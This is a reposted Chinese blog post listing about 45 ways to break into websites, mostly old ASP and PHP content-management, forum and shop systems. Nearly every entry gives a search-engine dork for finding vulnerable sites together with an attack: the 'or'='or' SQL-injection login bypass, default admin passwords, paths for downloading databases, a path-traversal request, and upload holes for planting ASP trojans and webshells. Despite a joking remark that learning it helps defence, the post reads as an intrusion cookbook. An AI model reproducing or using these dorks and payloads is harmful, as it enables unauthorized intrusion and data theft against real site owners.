40多种网站入侵的方法

转载链接:http://fdingy.blog.163.com/blog/static/3160814920107257619606/

 

     有兴趣的朋友可以学一下,学会了就知道怎么防了,哈哈!

1.

到GoogLe搜索一些关键字edit.asp?韩国肉鸡为多多数为MSSQL数据库!2到Googlesite:cq.cninurl:asp3利用挖掘鸡和一个ASP木马.文件名是login.asp路径组是/manage/关键词是went.asp用'or'='or'来登陆4关键字:CoNet ...1
到GoogLe搜索一些关键字edit.asp?韩国肉鸡为多多数为MSSQL数据库!
2.
到Googlesite:cq.cninurl:asp
3.
利用挖掘鸡和一个ASP木马.
文件名是login.asp
路径组是/manage/
关键词是went.asp
用'or'='or'来登陆
4
关键字:CoNetMIBVer1.0网站后台管理系统
帐号密码为'or'='or'
5.
动感购物系统
inurl:help.asp登陆,如未注册成为会员!
upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞
6。
默认数据库地址blogdata/acblog.asa
关键字:acblog
7.
百度/htdocs
注册里可以直接上传asa文件!
8.
/Database/#newasp.mdb
关键词:NewAspSiteManageSystemVersion
9.
用挖掘机
关键字:PoweredbyWEBBOY
页面:/upfile.asp
10.
baidu中搜索关键字Ver5.0Build0519
(存在上传漏洞)
11.
Upfile_Article.aspbbs/upfile.asp
输入关键字:poweredbymypower,
12.
inurl:winntystem32\inetsrv\在google里面输入这个就可以找到很多网站
13.
现在GOOGLE搜索关键字intitle:网站小助手 inurl:asp
14.
键字:首页最新动态新手指南舞曲音乐下载中心经典文章玩家风采装备购买站内
流言友情连接本站论坛
挖掘鸡的关键字添setup.asp
15.
VBulletin论坛的数据库
默认数据库地址!
/includes/functions.php
工具:
1.网站猎手下载地址:百度Google!
2.Google
关键字:
Poweredby:vBulletinVersion3.0.1
Poweredby:vBulletinVersion3.0.2
Poweredby:vBulletinVersion3.0.3
其中一个就可以了
16.
1.打开百度或GOOGLE搜索,输入poweredbycomersusASPshoppingcart
opensource。这是一个商场系统。
2.网站的最底部分,有个ComersusOpenTechnologiesLC。打开看下~~comersus系统~
猜到comersus.mdb.是数据库名
数据库都是放在database/后的
所以database/comersus.mdb
comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。
那样把前一个''store/''除去,再加上database/comersus.mdb试试
17.
无忧传奇官方站点程序。
1、后台管理地址:http://您的域名/msmiradmin/
2、默认后台管理帐号:msmir
3、默认后台管理密码:msmirmsmir
数据库文件为http://您的域名/msmirdata/msmirArticle.mdb
数据库连接文件为***********/Conn.asp
18.
百度里输入/skins/default/
19.
利用挖掘机
关键机:powerbyDiscuz
路径:/wish.php
配合:
Discuz!论坛wish.php远程包含漏洞工具使用
20.
上传漏洞.
工具:Domain3.5
网站猎手1.5版
关键字poweredbymypower
检测的页面或文件插入upfile_photo.asp
21.
新云漏洞

这个漏洞ACCESS和SQL版通吃。
Google搜索关键字"关于本站-网站帮助-广告合作-下载声明-友情连接-网站地
图-管理登录"
把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载
conn.asp
以源码,软件等下载站居多。
大家时常碰到数据库如果前面或者中间了#可以用#替换就可以下载了
\database\#newasp.mdb
如:#xzws.mdb改成#xzws.mdb
22.
通吃所有商城动力上传系统
使用工具:挖掘鸡v1.1明小子
商城入侵:
关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线
支付或下单后汇款->汇款确认->发货->完成
漏洞页面:upload.asp
upfile_flash.asp
动力入侵:
关键字:poweredbymypower
漏洞页面:upfile_photo.asp
Upfile_Soft.asp
upfile_adpic.asp
upfile_softpic.asp
23.
注射漏洞
百度搜索:oioj'sblog
24
动易
列目录
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp
25.
工具:网站猎手
关键词:inurl:Went.asp
后缀:manage/login.asp
口令:'or'='or'
26.
入侵魔兽私服
需要的工具:ASP木马一只。
Domain3.5明小子
关键字:AllRightReservedDesign:游戏联盟
后台地址:admin/login.asp
数据库的地址:chngame/#chngame.mdb
27.
漏洞是利用管理员iis设置的失误
用baidu关键字就是比较罕见的脚本名
动网:ReloadForumCache.asp
Leadbbs:makealltopanc.asp
BBSXP:admin_fso.asp
动易:admin_articlerecyclebin.asp
28.
国外站的爆库漏洞
关键字:sadRaven'sGuestbook
密码地址:/passwd.dat
后台地址:/admin.php
29.
Discuz4.1.0跨站漏洞
利用工具:1WAP浏览器
2WAP编码转换器
关键字:"intext:Discuz!4.1.0"
30.
关键字:尚奈克斯
后台路径/system/manage.asp
直接传ASP木马
31.
工具
1:网站猎手
2:大马一个
关键字:切勿关闭Cookies功能,否则您将不能登录
插入diy.asp
32.
关键字:Team5StudioAllrightsreserved
默认数据库:data/team.mdb
33.
工具:挖掘机辅臣数据库读取器
关键字:企业简介产品展示产品列表
后缀添加:/database/myszw.mdb
后台地址:admin/Login.asp
34.
关键子XXXinurl:Nclass.asp
在"系统设置"里写个木马。
会被保存到在config.asp内。
35.
不进后台照样拿动网WEBSHELL
data.asp?action=BackupData动网数据库备份默认路径
36.
工具:网站猎手WebShell
关键字:inurl:Went.asp
后缀:manage/login.asp
弱口令:'or'='or'
37.
关键字:Poweredby:QCDN_NEWS
随便扫遍文章加一个'来试探注入点
后台地址:admin_index.asp
38.
入侵雷池新闻发布系统
关键字:leichinews
去掉leichinews后面的.
打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
再上传马.....
进访问uppicanran.asp登陆马.
39.
关键字:PowerSystemOfArticleManagementVer3.0Build20030628
默认数据库:database\yiuwekdsodksldfslwifds.mdb
后台地址:自己扫描!
40.
一、通过GOOGLE搜索找大量注入点
关键字:asp?id=1gov.jp/asp?id=
页数:100
语言:想入侵哪个国家就填什么语言吧
41.
关键字:Poweredby:94KKBBS2005
利用密码找回功能找回admin
提问:ddddd回答:ddddd
42.
关键字:inurl:Went.asp
后台为manage/login.asp
后台密码:'or'='或者'or''=''or'登录 进入
默认数据库地址:Database/DataShop.mdb
43.
关键字:******inurl:readnews.asp
把最后一个/改成\直接暴库看密码进后台
随便添加个新闻在标题输入我们的一句话木马
44.
工具:一句话木马
BBsXp5.0sp1管理员猜解器
关键词:poweredbybbsxp5.00
进后台备份一句话马!
45.
关键字:程序核心:BJXSHOP网上开店专家

 

转载时请保留以下信息

    BY:独孤九剑

你可能感兴趣的:(职场,安全,休闲)